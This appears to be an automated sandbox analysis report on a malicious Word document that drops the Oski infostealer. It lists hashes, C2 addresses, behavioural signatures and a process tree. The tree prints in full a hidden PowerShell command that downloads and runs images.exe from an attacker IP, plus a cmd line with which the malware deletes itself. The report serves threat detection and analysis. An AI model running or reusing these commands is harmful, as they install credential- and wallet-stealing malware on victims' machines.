Analysis

max time kernel: 148s
max time network: 87s
platform: windows7_x64
resource: win7v20210410
submitted: 03/08/2021, 08:39
Static task: static1

Behavioral task: behavioral1
  Sample: T31597377-Confirm-20210802-100016-Email-5007377.doc
  Resource: win7v20210410

Behavioral task: behavioral2
  Sample: T31597377-Confirm-20210802-100016-Email-5007377.doc
  Resource: win10v20210410
General

Target: T31597377-Confirm-20210802-100016-Email-5007377.doc
Size: 229KB
MD5: 5dda83e206429216662517f5f4ba7718
SHA1: abbd782fa3cd388e66e7739b65abddfcaf0071fc
SHA256: 190a90d648e64c0f6c80a36bf00c5f2fdb8247260f5f38dfc13895b28f1c7fc2
SHA512: c8d0e5461219e832a376396bd5270b1380cca65515a453c2c911f3c9355aa86a855d07d26ce015dd7ed106e3b0617b98d2a951cfb771187274a48d0231a300c1
Malware Config

Extracted: httP://185.230.160.197/images/images.exe
Extracted (oski): http://2.56.59.226/www/
Signatures

Oski
Oski is an infostealer targeting browser data and crypto wallets.

Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

| description | pid | pid_target | Process | procid_target |
|---|---|---|---|---|
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 676 | 288 | powershell.exe | 24 |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1504 | 288 | powershell.exe | 24 |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1688 | 288 | powershell.exe | 24 |
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Blocklisted process makes network request 1 IoCs

| flow | pid | Process |
|---|---|---|
| 6 | 676 | powershell.exe |

Downloads MZ/PE file

Executes dropped EXE 6 IoCs

| pid | Process |
|---|---|
| 1568 | images.exe |
| 1936 | images.exe |
| 1404 | images.exe |
| 1504 | images.exe |
| 1660 | images.exe |
| 1456 | images.exe |

Loads dropped DLL 11 IoCs

| pid | Process |
|---|---|
| 676 | powershell.exe |
| 1456 | images.exe |
| 1456 | images.exe |
| 1456 | images.exe |
| 1456 | images.exe |
| 1456 | images.exe |
| 1660 | images.exe |
| 1660 | images.exe |
| 1660 | images.exe |
| 1660 | images.exe |
| 1660 | images.exe |
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of SetThreadContext 2 IoCs

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 1404 set thread context of 1660 | 1404 | images.exe | 43 |
| PID 1936 set thread context of 1456 | 1936 | images.exe | 44 |

Drops file in Windows directory 1 IoCs

| description | ioc | Process |
|---|---|---|
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE |

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.

| description | ioc | Process |
|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | images.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | images.exe |

Kills process with taskkill 2 IoCs

| pid | Process |
|---|---|
| 888 | taskkill.exe |
| 936 | taskkill.exe |
Modifies Internet Explorer settings 12 IoCs

| description | ioc | Process |
|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | images.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | images.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | images.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE |
Suspicious behavior: AddClipboardFormatListener 1 IoCs

| pid | Process |
|---|---|
| 288 | WINWORD.EXE |

Suspicious behavior: EnumeratesProcesses 8 IoCs

| pid | Process |
|---|---|
| 676 | powershell.exe |
| 676 | powershell.exe |
| 1688 | powershell.exe |
| 1504 | powershell.exe |
| 1688 | powershell.exe |
| 1504 | powershell.exe |
| 1568 | images.exe |
| 1568 | images.exe |

Suspicious use of AdjustPrivilegeToken 8 IoCs

| description | pid | Process |
|---|---|---|
| Token: SeDebugPrivilege | 676 | powershell.exe |
| Token: SeDebugPrivilege | 1688 | powershell.exe |
| Token: SeDebugPrivilege | 1504 | powershell.exe |
| Token: SeDebugPrivilege | 1568 | images.exe |
| Token: SeDebugPrivilege | 1936 | images.exe |
| Token: SeDebugPrivilege | 1404 | images.exe |
| Token: SeDebugPrivilege | 888 | taskkill.exe |
| Token: SeDebugPrivilege | 936 | taskkill.exe |

Suspicious use of SetWindowsHookEx 10 IoCs

| pid | Process |
|---|---|
| 288 | WINWORD.EXE |
| 288 | WINWORD.EXE |
| 288 | WINWORD.EXE |
| 288 | WINWORD.EXE |
| 1404 | images.exe |
| 1404 | images.exe |
| 1568 | images.exe |
| 1568 | images.exe |
| 1936 | images.exe |
| 1936 | images.exe |

Suspicious use of WriteProcessMemory 64 IoCs

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 288 wrote to memory of 676 | 288 | WINWORD.EXE | 31 |
| PID 288 wrote to memory of 676 | 288 | WINWORD.EXE | 31 |
| PID 288 wrote to memory of 676 | 288 | WINWORD.EXE | 31 |
| PID 288 wrote to memory of 676 | 288 | WINWORD.EXE | 31 |
| PID 288 wrote to memory of 1504 | 288 | WINWORD.EXE | 33 |
| PID 288 wrote to memory of 1504 | 288 | WINWORD.EXE | 33 |
| PID 288 wrote to memory of 1504 | 288 | WINWORD.EXE | 33 |
| PID 288 wrote to memory of 1504 | 288 | WINWORD.EXE | 33 |
| PID 288 wrote to memory of 1688 | 288 | WINWORD.EXE | 35 |
| PID 288 wrote to memory of 1688 | 288 | WINWORD.EXE | 35 |
| PID 288 wrote to memory of 1688 | 288 | WINWORD.EXE | 35 |
| PID 288 wrote to memory of 1688 | 288 | WINWORD.EXE | 35 |
| PID 676 wrote to memory of 1568 | 676 | powershell.exe | 37 |
| PID 676 wrote to memory of 1568 | 676 | powershell.exe | 37 |
| PID 676 wrote to memory of 1568 | 676 | powershell.exe | 37 |
| PID 676 wrote to memory of 1568 | 676 | powershell.exe | 37 |
| PID 1688 wrote to memory of 1936 | 1688 | powershell.exe | 38 |
| PID 1688 wrote to memory of 1936 | 1688 | powershell.exe | 38 |
| PID 1688 wrote to memory of 1936 | 1688 | powershell.exe | 38 |
| PID 1688 wrote to memory of 1936 | 1688 | powershell.exe | 38 |
| PID 1504 wrote to memory of 1404 | 1504 | powershell.exe | 39 |
| PID 1504 wrote to memory of 1404 | 1504 | powershell.exe | 39 |
| PID 1504 wrote to memory of 1404 | 1504 | powershell.exe | 39 |
| PID 1504 wrote to memory of 1404 | 1504 | powershell.exe | 39 |
| PID 1568 wrote to memory of 1504 | 1568 | images.exe | 42 |
| PID 1568 wrote to memory of 1504 | 1568 | images.exe | 42 |
| PID 1568 wrote to memory of 1504 | 1568 | images.exe | 42 |
| PID 1568 wrote to memory of 1504 | 1568 | images.exe | 42 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1404 wrote to memory of 1660 | 1404 | images.exe | 43 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1936 wrote to memory of 1456 | 1936 | images.exe | 44 |
| PID 1660 wrote to memory of 512 | 1660 | images.exe | 45 |
| PID 1660 wrote to memory of 512 | 1660 | images.exe | 45 |
| PID 1660 wrote to memory of 512 | 1660 | images.exe | 45 |
| PID 1660 wrote to memory of 512 | 1660 | images.exe | 45 |
| PID 512 wrote to memory of 888 | 512 | cmd.exe | 47 |
| PID 512 wrote to memory of 888 | 512 | cmd.exe | 47 |
| PID 512 wrote to memory of 888 | 512 | cmd.exe | 47 |
| PID 512 wrote to memory of 888 | 512 | cmd.exe | 47 |
| PID 1456 wrote to memory of 784 | 1456 | images.exe | 48 |
| PID 1456 wrote to memory of 784 | 1456 | images.exe | 48 |
| PID 1456 wrote to memory of 784 | 1456 | images.exe | 48 |
| PID 1456 wrote to memory of 784 | 1456 | images.exe | 48 |
| PID 784 wrote to memory of 936 | 784 | cmd.exe | 50 |
| PID 784 wrote to memory of 936 | 784 | cmd.exe | 50 |
Processes

Process tree (indentation shows parent/child depth):

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\T31597377-Confirm-20210802-100016-Email-5007377.doc"
  PID: 288
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"
    PID: 676
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\images.exe
      Command line: "C:\Users\Admin\AppData\Roaming\images.exe"
      PID: 1568
      - Executes dropped EXE
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Roaming\images.exe
        Command line: "C:\Users\Admin\AppData\Roaming\images.exe"
        PID: 1504
        - Executes dropped EXE

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"
    PID: 1504
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\images.exe
      Command line: "C:\Users\Admin\AppData\Roaming\images.exe"
      PID: 1404
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Modifies Internet Explorer settings
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Roaming\images.exe
        Command line: "C:\Users\Admin\AppData\Roaming\images.exe"
        PID: 1660
        - Executes dropped EXE
        - Loads dropped DLL
        - Checks processor information in registry
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 1660 & erase C:\Users\Admin\AppData\Roaming\images.exe & RD /S /Q C:\\ProgramData\\943401550568339\\* & exit
          PID: 512
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\taskkill.exe
            Command line: taskkill /pid 1660
            PID: 888
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"
    PID: 1688
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\images.exe
      Command line: "C:\Users\Admin\AppData\Roaming\images.exe"
      PID: 1936
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Modifies Internet Explorer settings
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Roaming\images.exe
        Command line: "C:\Users\Admin\AppData\Roaming\images.exe"
        PID: 1456
        - Executes dropped EXE
        - Loads dropped DLL
        - Checks processor information in registry
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 1456 & erase C:\Users\Admin\AppData\Roaming\images.exe & RD /S /Q C:\\ProgramData\\496765114840226\\* & exit
          PID: 784
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\taskkill.exe
            Command line: taskkill /pid 1456
            PID: 936
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

  C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
    PID: 2024